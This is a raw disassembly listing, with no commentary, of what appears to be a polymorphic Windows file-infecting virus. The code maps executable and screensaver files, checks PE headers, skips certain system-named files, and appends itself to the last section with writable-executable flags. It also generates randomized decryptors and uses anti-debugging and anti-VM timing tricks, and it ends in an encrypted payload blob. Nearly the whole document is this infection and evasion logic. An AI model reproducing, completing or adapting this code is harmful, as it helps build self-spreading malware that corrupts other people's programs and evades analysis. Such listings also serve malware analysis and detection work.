test dword ptr [ebp+403431h], 20h
jz short loc_31429D60
test dword ptr [ebp+403431h], 20000000h
jz short loc_31429D26
loc_31429D19: ; CODE XREF: UPX2:31429D24�j
test edi, 3
jz short loc_31429D26
mov al, 90h
stosb
jmp short loc_31429D19
; ---------------------------------------------------------------------------
loc_31429D26: ; CODE XREF: UPX2:31429D17�j
; UPX2:31429D1F�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_31429D54
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_31429D5E
; ---------------------------------------------------------------------------
loc_31429D54: ; CODE XREF: UPX2:31429D46�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_31429D5E: ; CODE XREF: UPX2:31429D52�j
stosw
loc_31429D60: ; CODE XREF: UPX2:31429D0B�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_31429DDF
test dword ptr [ebp+403431h], 20000000h
jz short loc_31429D85
loc_31429D78: ; CODE XREF: UPX2:31429D83�j
test edi, 3
jz short loc_31429D85
mov al, 90h
stosb
jmp short loc_31429D78
; ---------------------------------------------------------------------------
loc_31429D85: ; CODE XREF: UPX2:31429D76�j
; UPX2:31429D7E�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_31429DAE
lea eax, [ebp+403429h]
loc_31429DA6: ; CODE XREF: UPX2:31429DAC�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_31429DA6
loc_31429DAE: ; CODE XREF: UPX2:31429D9E�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_31429DC3
mov ax, 0C031h
stosw
loc_31429DC3: ; CODE XREF: UPX2:31429DBB�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_31429DDC
mov ax, 0C031h
stosw
loc_31429DDC: ; CODE XREF: UPX2:31429DD4�j
mov al, 0C3h
stosb
loc_31429DDF: ; CODE XREF: UPX2:31429D6A�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_31429DF7
push edi
sub edi, eax
pop eax
jmp short loc_31429E10
; ---------------------------------------------------------------------------
loc_31429DF7: ; CODE XREF: UPX2:31429DEF�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_31429E10: ; CODE XREF: UPX2:31429DF5�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_31429E30
neg eax
loc_31429E30: ; CODE XREF: UPX2:31429E2C�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_31429E34 proc near ; CODE XREF: sub_3142A260+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_3142A01C
call near ptr loc_31429E54+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_31429E54: ; CODE XREF: sub_31429E34+F�p
add bh, bh
sub_31429E34 endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_3142956E
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_3142956E
mov edi, [ebp+4039A6h]
push esi
call sub_3142956E
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_3142A01C
jz loc_3142A01C
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_31429FED
loc_31429ECE: ; CODE XREF: sub_31429FED+29�j
lodsb
cmp al, 0E8h
jnz loc_31429F79
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_3142956E
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_31429EFC
cmp eax, [edi+0Ch]
jnb loc_3142A015
jmp short loc_31429F08
; ---------------------------------------------------------------------------
loc_31429EFC: ; CODE XREF: sub_31429FED-FE�j
cmp [ebp+4039A6h], edx
jnz loc_3142A015
loc_31429F08: ; CODE XREF: sub_31429FED-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_3142A015
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_3142956E
cmp [ebp+4039A6h], edi
jnz loc_3142A015
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3142A015
cmp eax, [edi+8]
jnb loc_3142A015
loc_31429F51: ; CODE XREF: sub_31429FED+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_3142A02B
jmp loc_3142A015
; ---------------------------------------------------------------------------
loc_31429F79: ; CODE XREF: sub_31429FED-11C�j
cmp al, 0FFh
jnz loc_3142A015
cmp byte ptr [esi], 15h
jnz loc_3142A015
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_3142956E
cmp [ebp+4039A6h], edi
jnz short loc_3142A015
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_31429FC2
cmp eax, [ebp+4039C6h]
jb short loc_3142A02B
loc_31429FC2: ; CODE XREF: sub_31429FED-35�j
cmp eax, 70000000h
jb short loc_3142A000
call sub_31429FED
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_31429FEC
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_3142A007
; ---------------------------------------------------------------------------
locret_31429FEC: ; CODE XREF: sub_31429FED-F�j
retn
; END OF FUNCTION CHUNK FOR sub_31429FED
; =============== S U B R O U T I N E =======================================
sub_31429FED proc near ; CODE XREF: sub_31429FED-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 31429ECE SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_31429675
popa
loc_3142A000: ; CODE XREF: sub_31429FED-26�j
test eax, 80000000h
jnz short loc_3142A015
loc_3142A007: ; CODE XREF: sub_31429FED-3�j
sub eax, [edi+0Ch]
jb short loc_3142A015
cmp eax, [edi+8]
jb loc_31429F51
loc_3142A015: ; CODE XREF: sub_31429FED-F9�j
; sub_31429FED-EB�j ...
dec ecx
jnz loc_31429ECE
loc_3142A01C: ; CODE XREF: sub_31429E34+9�j
; UPX2:31429EB6�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_3142A067
; ---------------------------------------------------------------------------
loc_3142A02B: ; CODE XREF: sub_31429FED-7F�j
; sub_31429FED-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_3142A067: ; CODE XREF: sub_31429FED+3C�j
pop edi
pop esi
retn
sub_31429FED endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3142A06A proc near ; CODE XREF: UPX2:3142A238�p
; sub_3142A260+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_3142A13B
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_3142A13B
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_3142A5F3
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_3142A5E7
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_3142A5E7
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_3142A5E7
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_3142A5BF
mov [ebp+403972h], eax
locret_3142A13B: ; CODE XREF: sub_3142A06A+10�j
; sub_3142A06A+27�j ...
retn
sub_3142A06A endp
; =============== S U B R O U T I N E =======================================
sub_3142A13C proc near ; CODE XREF: sub_3142A260+117�p
; sub_3142A260+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3142A156
add eax, [ebp+40106Dh]
loc_3142A156: ; CODE XREF: sub_3142A13C+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_3142A13C endp
; =============== S U B R O U T I N E =======================================
sub_3142A181 proc near ; CODE XREF: sub_3142A260:loc_3142A2AF�p
; sub_3142A260+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_3142A186: ; CODE XREF: sub_3142A181+23�j
jecxz short locret_3142A1BD
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3142A1BD
cmp dword ptr [edx+0Ch], 1
jb short loc_3142A186
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_3142A1BD: ; CODE XREF: sub_3142A181:loc_3142A186�j
; sub_3142A181+1D�j ...
retn
sub_3142A181 endp
; =============== S U B R O U T I N E =======================================
sub_3142A1BE proc near ; CODE XREF: UPX2:3142A24A�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3142A1BE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3142A1CB: ; CODE XREF: UPX2:3142A1EC�j
mov ecx, edi
jmp short loc_3142A1DA
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_3142A1D6: ; CODE XREF: UPX2:3142A1E8�j
mov ebx, edi
xor ecx, ecx
loc_3142A1DA: ; CODE XREF: UPX2:3142A1CD�j
; UPX2:3142A1F0�j
lodsb
cmp al, 61h
jb short loc_3142A1E5
cmp al, 7Ah
ja short loc_3142A1E5
sub al, 20h
loc_3142A1E5: ; CODE XREF: UPX2:3142A1DD�j
; UPX2:3142A1E1�j
stosb
cmp al, 5Ch
jz short loc_3142A1D6
cmp al, 2Eh
jz short loc_3142A1CB
cmp al, 0
jnz short loc_3142A1DA
jecxz short locret_3142A1BD
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3142A208
cmp eax, 524353h
jnz locret_3142A13B
loc_3142A208: ; CODE XREF: UPX2:3142A1FB�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3142A13B
cmp eax, 4E554357h
jz locret_3142A13B
cmp eax, 32334357h
jz locret_3142A13B
cmp eax, 4F545350h
jz locret_3142A13B
xor ebx, ebx
call sub_3142A06A
jz locret_3142A13B
xor edx, edx
call sub_3142A260
call sub_3142A1BE
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_3142A59D
; =============== S U B R O U T I N E =======================================
sub_3142A260 proc near ; CODE XREF: UPX2:3142A245�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_3142A59D
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_3142A59D
test dword ptr [ebx+16h], 2000h
jnz loc_3142A59D
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_3142A59D
jecxz short loc_3142A2AF
cmp ecx, 101h
jbe loc_3142A59D
loc_3142A2AF: ; CODE XREF: sub_3142A260+41�j
call sub_3142A181
jb loc_3142A59D
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_31428DB9
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_3142A2D9: ; CODE XREF: sub_3142A260+92�j
push 20h
dec cl
pop eax
js short loc_3142A2F4
call sub_31428DB9
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_3142A2D9
; ---------------------------------------------------------------------------
loc_3142A2F4: ; CODE XREF: sub_3142A260+7E�j
; sub_3142A260+CD�j ...
push 6
pop ecx
loc_3142A2FA: ; CODE XREF: sub_3142A260+B8�j
push 6
pop eax
call sub_31428DB9
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_3142A2FA
test dword ptr [ebp+403431h], 8
jnz short loc_3142A32F
cmp byte ptr [ebp+40342Bh], 1
jz short loc_3142A2F4
loc_3142A32F: ; CODE XREF: sub_3142A260+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3142A356
cmp byte ptr [ebp+403429h], 5
jz short loc_3142A2F4
cmp byte ptr [ebp+40342Ah], 5
jz short loc_3142A2F4
cmp byte ptr [ebp+40342Bh], 5
jz short loc_3142A2F4
loc_3142A356: ; CODE XREF: sub_3142A260+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3142A36B
cmp byte ptr [ebp+403429h], 2
ja short loc_3142A2F4
loc_3142A36B: ; CODE XREF: sub_3142A260+100�j
and dword ptr [ebp+4039AEh], 0
call loc_31429806
call sub_3142A13C
call sub_3142A5A6
mov ebx, [ebp+403976h]
call sub_3142A06A
jz loc_3142A59D
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_3142A181
jb loc_3142A59D
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3142A3D3
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_3142A3D3: ; CODE XREF: sub_3142A260+163�j
push edi
mov ecx, 90Fh
lea esi, [ebp+401000h]
rep movsd
mov cl, 0
jecxz short loc_3142A3E7
rep movsb
loc_3142A3E7: ; CODE XREF: sub_3142A260+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_3142A49F
push dword ptr [ebx+28h]
call sub_3142956E
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_3142A49F
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3142A424
xor ecx, ecx
loc_3142A424: ; CODE XREF: sub_3142A260+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_3142A48B
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_3142A464
neg dword ptr [eax]
loc_3142A464: ; CODE XREF: sub_3142A260+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_3142A482
neg dword ptr [eax]
loc_3142A482: ; CODE XREF: sub_3142A260+21E�j
push ecx
call sub_3142A13C
pop ecx
jmp short loc_3142A497
; ---------------------------------------------------------------------------
loc_3142A48B: ; CODE XREF: sub_3142A260+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3142A497: ; CODE XREF: sub_3142A260+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_3142A49F: ; CODE XREF: sub_3142A260+191�j
; sub_3142A260+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_3142A4B8
imul edx, 12345678h
loc_3142A4B8: ; CODE XREF: sub_3142A260+250�j
mov [eax-1], dl
call sub_3142848C
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_3142A4E9
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_3142A4E9: ; CODE XREF: sub_3142A260+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3142A50E
push edx
call sub_31429E34
pop edx
loc_3142A50E: ; CODE XREF: sub_3142A260+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_3142A519
mov [ebx+28h], ecx
loc_3142A519: ; CODE XREF: sub_3142A260+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_3142A52A
mov [edx+8], ecx
loc_3142A52A: ; CODE XREF: sub_3142A260+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_3142A55B
add ecx, [ebp+40106Dh]
loc_3142A55B: ; CODE XREF: sub_3142A260+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_3142A57D
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_3142A57D
mov dh, [ebp+403430h]
loc_3142A57D: ; CODE XREF: sub_3142A260+307�j
; sub_3142A260+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_3142A594
loc_3142A589: ; CODE XREF: sub_3142A260+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3142A589
jmp short loc_3142A59D
; ---------------------------------------------------------------------------
loc_3142A594: ; CODE XREF: sub_3142A260+327�j
; sub_3142A260+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3142A594
loc_3142A59D: ; CODE XREF: UPX2:3142A25B�j
; sub_3142A260+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3142A260 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3142A5A6 proc near ; CODE XREF: sub_3142A260+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_3142A13B
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_3142A5BF: ; CODE XREF: sub_3142A06A+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_3142A5E7: ; CODE XREF: sub_3142A06A+6B�j
; sub_3142A06A+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_3142A5F3: ; CODE XREF: sub_3142A06A+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_3142A5A6 endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 403349h, 0C10FF058h, 40158085h
dd 0C3C08500h, 0F0FFC883h, 8085C10Fh, 0C3004015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFB7EE8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 40384EB5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 4035F895h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFB2Bh, 0FFFF7FE8h, 0B8C361FFh, 74h
dd 2FB8B1EBh, 0E8000000h, 10h, 0B80020C2h, 30h, 3E8h, 24C200h
dd 0C24548Dh, 0F8832ECDh, 60197C00h, 0E8h, 24548B00h, 1A8B5D30h
dd 3413ED81h, 39E80040h, 61FFFFE5h, 70004C2h, 3020601h
dd 74D3DC05h, 0FF2C0E0Bh, 10D015h, 9001h, 3Fh dup(0)
dd 9B470000h, 8AD7C80h, 3317C83h, 0ADA07C91h, 7C80h, 2 dup(0)
dd 0BDB60000h, 1A247C80h, 945C7C80h, 23677C80h, 42C7C80h
dd 6377C81h, 4B0F7C81h, 0C0587C86h, 0E7EC7C80h, 153C7C80h
dd 0A777C81h, 1C457C81h, 0B6A17C83h, 8FF7C80h, 5DCA7C86h
dd 11DA7C83h, 2ADE7C81h, 1D777C81h, 0B9057C80h, 0BB767C80h
dd 9E17C80h, 3DE57C83h, 3F587C86h, 27827C86h, 1CB87C81h
dd 24427C83h, 0B1C7C80h, 0B9747C81h, 9A517C80h, 0D877C80h
dd 0D4607C81h, 0D6827C90h, 0D7547C90h, 0D7697C90h, 0D7937C90h
dd 0DC557C90h, 0DCFD7C90h, 0DD907C90h, 0DEB67C90h, 0EA327C90h
dd 30C67C90h, 7C91h, 14h dup(0)
dd 380036h, 3142A920h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 5F0032h, 690056h, 740072h, 75h, 0BCh dup(0)
dd 69h, 0Ch dup(0)
dd 7FFDF000h, 18E0h dup(0)
; ---------------------------------------------------------------------------
cld
call loc_3143102E
; =============== S U B R O U T I N E =======================================
sub_31431006 proc near ; CODE XREF: UPX2:3143107D�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_3143100E: ; CODE XREF: sub_31431006+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_3143100E
pop ebx
retn
sub_31431006 endp
; ---------------------------------------------------------------------------
db 38h, 35h
; ---------------------------------------------------------------------------
loc_3143101F: ; CODE XREF: UPX2:31431068�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_31431021: ; CODE XREF: UPX2:31431036�j
; UPX2:31431047�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_31431055
; =============== S U B R O U T I N E =======================================
sub_3143102B proc near ; CODE XREF: UPX2:3143104A�p
; UPX2:31431050�p
rdtsc
retn
sub_3143102B endp
; ---------------------------------------------------------------------------
loc_3143102E: ; CODE XREF: UPX2:31431001�p
test eax, eax
jnz short loc_3143103A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_31431021
jmp short loc_31431049
; ---------------------------------------------------------------------------
loc_3143103A: ; CODE XREF: UPX2:31431030�j
push eax
sidt fword ptr [esp-2]
pop eax
mov eax, [eax+6]
loc_31431044: ; CODE XREF: UPX2:3143108B�j
shl eax, 10h
jns short loc_31431021
loc_31431049: ; CODE XREF: UPX2:31431038�j
push ebp
call sub_3143102B
xchg eax, ecx
call sub_3143102B
loc_31431055: ; CODE XREF: UPX2:31431029�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 8D77h
sub eax, 100h
jnb short loc_3143101F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_31431006
sal dword ptr ds:0AA8131E6h, cl
pop ebx
cmp [edx], edx
loopne loc_31431044
mov eax, 0F98EFC19h
mov dh, 9Eh
sub ah, [ebx-7060A84Fh]
mov dword ptr [edi], 0E77770Dh
loope near ptr loc_314310DC+3
mov ecx, 14C25AE7h
xchg cl, [edi]
pop ebx
lock or [edx-4DEB141Fh], dl
lahf
sub dl, [edi-76h]
call near ptr 0BDE0B63Ch
cmp ch, cl
xchg eax, esp
cmp al, 74h
shr byte ptr [ebx], 2Dh
cmc
and ecx, [esi+1Bh]
cld
add eax, 0F89E278Bh
inc ebp
sbb [ecx-0E7CC1A2h], esp
mov ebp, 0AB187F0Dh
mov [ecx+ebx*4-67h], gs
loc_314310DC: ; CODE XREF: UPX2:314310A0�j
ror dword ptr [ecx+5A737363h], 1
; ---------------------------------------------------------------------------
dw 0
dd 8E92DAE9h, 0BD4D166Bh, 326D7CD5h, 19032576h, 9698B561h
dd 7641CACEh, 141B5659h, 0B0B9D2ECh, 184A5362h, 3D3EA97Ch
dd 2614C721h, 939155B6h, 6F9285CBh, 0C23564Bh, 0BFB4C4CBh
dd 91B95D12h, 9F7EFEF6h, 0C8E8DCh, 0A8D555Eh, 147ECD07h
dd 3997CFCAh, 0FD00085Eh, 83C60B3Eh, 0B350FD74h, 0BB9EE5E8h
dd 8BBA472Eh, 84523CC3h, 65651D25h, 0C7523F1Eh, 6840083Ah
dd 0BED0F0B1h, 931BE2D4h, 0B7AC96E7h, 474131BFh, 52621A39h
dd 27721A50h, 8A3D352Dh, 0ACAC9A57h, 9648DFE0h, 0B3917DF3h
dd 0EA84B8BBh, 0C8A02742h, 0CAFCB888h, 257AB50Dh, 0B196E291h
dd 979DDCECh, 7FB15C78h, 496DB15Ch, 596C3116h, 0EB5C6E91h
dd 0F536CED2h, 25AC7484h, 0F10D80Dh, 166902CCh, 8129B1F4h
dd 5E583021h, 0E8240807h, 655AFACBh, 0F49F6709h, 7D992BD6h
dd 0FC797168h, 0A162A171h, 0C4541C1Dh, 0D0C13C06h, 0C1A5F6C8h
dd 9B9376DFh, 9E551D3h, 0FB750D51h, 0D3F3573Bh, 0AFF5EB1Bh
dd 9D51066Ah, 23400E7Eh, 15CE9F50h, 361E6345h, 0F8DACA3Eh
dd 0F0892F57h, 1A5053E6h, 0BBB982EDh, 0C9B311F2h, 16936B4Bh
dd 0C385E809h, 7295B134h, 0B74DA2A8h, 22497A15h, 37B57982h
dd 2422EA87h, 731AA85Dh, 7AFCF4E1h, 0B7EE3DF7h, 0B3D79FA6h
dd 462D5D11h, 0D9B27E7Eh, 2DF726EBh, 0DE8D3E0Eh, 0FAF9C0AEh
dd 89F2D033h, 0BDD4AC8Bh, 42430A07h, 844EE285h, 18F4E4D7h
dd 63895155h, 0F7F6BC68h, 873D2C45h, 2EDBF396h, 0E136E9Ch
dd 685D9F76h, 351C5C60h, 89864E61h, 0F3F1363Ah, 6067C12Bh
dd 99809698h, 3A704841h, 8BB4E48Dh, 0A09BDEEFh, 82B35CF3h
dd 527D7189h, 5C6E0A5Eh, 21589E25h, 363903C5h, 8F0FD3EDh
dd 1E13DBEBh, 7E8211CDh, 96683EB6h, 0A75B130Fh, 404791E0h
dd 3305D6C4h, 8B9BD7EAh, 0F1F0D7E8h, 0FC734446h, 0E8E9B389h
dd 79C69AABh, 0B23B8CBDh, 0B6B476FBh, 1C9E5643h, 3B205568h
dd 7887BF43h, 0FE62A2B0h, 0D9531B1Fh, 8FEC090Fh, 2C5D0AF7h
dd 0B117E7EAh, 0B586CFE2h, 754417CDh, 0E2E15652h, 4EB39015h
dd 31378487h, 2A19DD71h, 0E6694781h, 9F8644CEh, 0F3700816h
dd 0EFF63F17h, 4CB4EC17h, 623F8F84h, 0CF25EDF0h, 94925BB9h
dd 2D007A41h, 0A1E73409h, 22FA1CCh, 0CB437FECh, 0F5DE7F61h
dd 497610EEh, 1D963C5Bh, 0CDEE547Dh, 6A758835h, 0D35B9EA2h
dd 0BBBBF242h, 3C1A1F83h, 1F1EABEDh, 27ED5357h, 52FC8749h
dd 0CACA03h, 58287935h, 284163DFh, 0ADAE162Ch, 1B712F6Eh
dd 88E294D8h, 0F5F5BDA8h, 33234125h, 9FDEF2C8h, 10B793F8h
dd 2AF37344h, 4370A025h, 0F854D2Fh, 7AF2D068h, 346442E5h
dd 99CFFF96h, 6C530369h, 0CFA87010h, 0EC7F8CDDh, 0D17B51Bh
dd 0B2EF8794h, 55A2A07Ch, 0C7CBAF16h, 358272FFh, 1BA45C7Dh
dd 1011D1CFh, 0D88DA9C3h, 0FAEB5E34h, 0D2D42112h, 0C4F69A89h
dd 0A7BE1B03h, 9F907138h, 4C982A85h, 927A7269h, 0E7E7AFA4h
dd 3F3A7253h, 0B392FAF9h, 43468190h, 0CAF90302h, 6F7CBDB5h
dd 88263E03h, 0D4C8723Ah, 8CD4901Ch, 0EEBEB6A2h, 460B99A2h
dd 0C0D9F9Bh, 8205FDFDh, 4B0765FFh, 0B7DDCD3Ah, 24999E4Fh
